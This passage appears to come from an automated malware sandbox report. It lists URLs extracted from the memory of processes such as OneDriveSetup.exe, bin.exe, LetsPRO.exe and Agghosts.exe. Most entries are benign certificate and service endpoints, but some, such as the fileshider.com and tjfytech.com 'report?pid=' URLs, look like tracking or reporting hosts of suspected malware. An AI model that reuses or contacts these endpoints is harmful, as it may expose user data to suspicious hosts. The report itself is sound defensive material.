                Source: svchost.exe, 00000001.00000003.1203263040.000001B0AE3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                Source: svchost.exe, 00000001.00000003.1203263040.000001B0AE3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                Source: svchost.exe, 00000001.00000003.1203263040.000001B0AE3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                Source: svchost.exe, 00000001.00000003.1203263040.000001B0AE3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                Source: svchost.exe, 00000001.00000003.1203263040.000001B0AE3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                Source: svchost.exe, 00000001.00000003.1203263040.000001B0AE3DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                Source: svchost.exe, 00000001.00000003.1203263040.000001B0AE497000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                Source: bin.exe, 00000017.00000003.1512955071.0000000002735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fontawesome.iohttp://fontawesome.io/license/
                Source: bin.exe, 00000017.00000003.1512955071.0000000002735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fontawesome.iohttp://fontawesome.io/license/Copyright
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/AppMenuDictionary.xaml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/AppMenuDictionary.xamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/ButtonDictionary.xaml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/ButtonDictionary.xamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/RadioButtonDictionary.xaml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/RadioButtonDictionary.xamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/ScrollViewDictionary.xaml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/ScrollViewDictionary.xamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/TabControllerDictionary.xaml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/TabControllerDictionary.xamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/TextBoxDictionary.xaml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/TextBoxDictionary.xamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/WindowDictionary.xaml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/WindowDictionary.xamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/app.xaml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/app.xamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/app.baml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/app.bamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/appmenudictionary.baml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/appmenudictionary.bamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/buttondictionary.baml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/buttondictionary.bamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/radiobuttondictionary.baml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/radiobuttondictionary.bamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/scrollviewdictionary.baml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/scrollviewdictionary.bamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/tabcontrollerdictionary.baml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/tabcontrollerdictionary.bamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/textboxdictionary.baml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/textboxdictionary.bamld
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/windowdictionary.baml
                Source: LetsPRO.exe, 00000037.00000002.1887905205.000000000348A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/windowdictionary.bamld
                Source: bin.exe, 00000017.00000003.1514589581.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1527350811.000000000273B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/avalonedit
                Source: bin.exe, 00000017.00000003.1514589581.000000000273B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.Highlighting
                Source: bin.exe, 00000017.00000003.1514589581.000000000273B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.HighlightingQ
                Source: bin.exe, 00000017.00000003.1514589581.000000000273B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008
                Source: bin.exe, 00000017.00000003.1514589581.000000000273B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/syntaxdefinition/20081Error
                Source: LetsPRO.exe, 00000037.00000002.1890859307.0000000005F22000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                Source: bin.exe, 00000017.00000003.1655545010.0000000002737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://logging.apache.org/log4net/release/faq.html#trouble-EventLog
                Source: bin.exe, 00000017.00000003.1872779362.000000000060F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000002.1960630433.000000000040A000.00000004.00000001.01000000.00000010.sdmp, bin.exe, 00000017.00000000.1415007556.000000000040A000.00000008.00000001.01000000.00000010.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: powershell.exe, 00000019.00000002.1803364576.000000000607B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F795791000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F795791000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1506130454.0000000002732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F795791000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1506130454.0000000002732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                Source: bin.exe, 00000017.00000003.1506130454.0000000002732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0P
                Source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F795791000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: bin.exe, 00000017.00000003.1588475282.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1571632346.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1534928087.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1547368330.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1685265408.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1601138069.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1623511501.000000000273E000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1682638715.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1569113224.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1668604569.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1619337854.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1526004795.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1546714965.000000000273C000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1604889904.0000000002732000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1598303869.000000000273A000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1594592668.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1614739993.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1532987225.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 
00000017.00000003.1607032792.000000000526F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1588475282.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1571632346.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1534928087.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1547368330.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1685265408.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1601138069.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1623511501.000000000273E000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1682638715.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1569113224.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1668604569.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1619337854.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1526004795.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1546714965.000000000273C000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1604889904.0000000002732000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1598303869.000000000273A000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1594592668.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 
00000017.00000003.1614739993.0000000002734000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                Source: bin.exe, 00000017.00000003.1588475282.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1571632346.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1534928087.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1547368330.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1685265408.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1601138069.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1623511501.000000000273E000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1682638715.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1569113224.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1668604569.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1619337854.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1526004795.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1546714965.000000000273C000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1604889904.0000000002732000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1598303869.000000000273A000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1594592668.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1614739993.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1532987225.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 
00000017.00000003.1607032792.000000000526F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45codesignca20200V
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr103
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                Source: bin.exe, 00000017.00000003.1588475282.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1571632346.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1534928087.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1547368330.000000000526F000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1685265408.0000000002738000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1601138069.000000000273D000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1623511501.000000000273E000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1682638715.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1569113224.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1668604569.0000000002736000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1619337854.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1526004795.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1546714965.000000000273C000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1604889904.0000000002732000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1598303869.000000000273A000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1594592668.0000000002733000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1614739993.0000000002734000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1532987225.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 
00000017.00000003.1607032792.000000000526F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: powershell.exe, 00000019.00000002.1800069365.0000000005166000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: OneDriveSetup.exe, 00000000.00000002.1307380542.000001F792D0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pss.bdstatic.com/r/www/cache/static/global/img/pc_direct_42d6311.png)
                Source: OneDriveSetup.exe, 00000000.00000002.1307380542.000001F792D0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pss.bdstatic.com/r/www/cache/static/home/img/icons_0c37e9b.png);background-image:url(http://p
                Source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F7956FB000.00000004.00000020.00020000.00000000.sdmp, Agghosts.exe, 00000009.00000002.3066025850.000000000087F000.00000002.00000001.01000000.0000000B.sdmp, Agghosts.exe, 00000018.00000002.3065288603.000000000087F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://s.fileshider.com/report?pid=
                Source: OneDriveSetup.exe, 00000000.00000003.1283662879.000001F7956FB000.00000004.00000020.00020000.00000000.sdmp, Agghosts.exe, 00000009.00000002.3066025850.000000000087F000.00000002.00000001.01000000.0000000B.sdmp, Agghosts.exe, 00000018.00000002.3065288603.000000000087F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://s.fileshider.com/url3?pid=
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
                Source: Agghosts.exe, 00000018.00000002.3065288603.000000000087F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://s.tjfytech.com/report?pid=
                Source: bin.exe, 00000017.00000003.1512955071.0000000002735000.00000004.00000020.00020000.00000000.sdmp, bin.exe, 00000017.00000003.1524518889.0000000002738000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000000.1873659229.0000000000F32000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: http://schemas.fontawesome.io/icons/
                Source: svchost.exe, 00000002.00000002.1372197771.000001DA23858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364986552.000001DA23857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                Source: OneDriveSetup.exe, 00000000.00000002.1307380542.000001F792C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.gcc.office.net/odb/v1.0/synchealth
                Source: OneDriveSetup.exe, 00000000.00000000.1201032034.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmp, OneDriveSetup.exe, 00000000.00000002.1309600075.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://clients.config.gcc.office.net/odb/v1.0/synchealthUpdateRingSettingsManager::TryUpdateF:
                Source: OneDriveSetup.exe, 00000000.00000000.1201032034.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmp, OneDriveSetup.exe, 00000000.00000002.1309600075.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://clients.config.office.net/collector/v1.0/inventoryodb0.010.03ar;bg;ca;cs;da;de;el;en;en-GB;e
                Source: OneDriveSetup.exe, 00000000.00000002.1307380542.000001F792C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/collector/v1.0/inventoryodbK)
                Source: OneDriveSetup.exe, 00000000.00000002.1307380542.000001F792C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                Source: OneDriveSetup.exe, 00000000.00000000.1201032034.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmp, OneDriveSetup.exe, 00000000.00000002.1309600075.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey25.016393=%I.%M
                Source: powershell.exe, 00000019.00000002.1803364576.000000000607B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000019.00000002.1803364576.000000000607B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000019.00000002.1803364576.000000000607B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: OneDriveSetup.exe, OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
                Source: OneDriveSetup.exe, OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
                Source: OneDriveSetup.exe, OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                Source: OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
                Source: bin.exe, 00000017.00000003.1653704947.0000000002822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d1dmgcawtbm6l9.cloudfront.net/rest-apiinvalid
                Source: OneDriveSetup.exe, 00000000.00000000.1201032034.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmp, OneDriveSetup.exe, 00000000.00000002.1309600075.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://dc.services.visualstudio.com/v2/track
                Source: OneDriveSetup.exe, 00000000.00000000.1201032034.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmp, OneDriveSetup.exe, 00000000.00000002.1309600075.00007FF6B514C000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://dc.services.visualstudio.com/v2/track8N
                Source: svchost.exe, 00000002.00000002.1372197771.000001DA23858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364986552.000001DA23857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
                Source: svchost.exe, 00000002.00000003.1364654268.000001DA2385A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372377947.000001DA23870000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364366712.000001DA23862000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364756986.000001DA23843000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372281059.000001DA23863000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364131610.000001DA2386E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372108711.000001DA23844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000002.00000002.1372197771.000001DA23858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364986552.000001DA23857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                Source: svchost.exe, 00000002.00000003.1364294967.000001DA23867000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372320141.000001DA23868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                Source: svchost.exe, 00000002.00000003.1363995897.000001DA23874000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1372421740.000001DA23876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
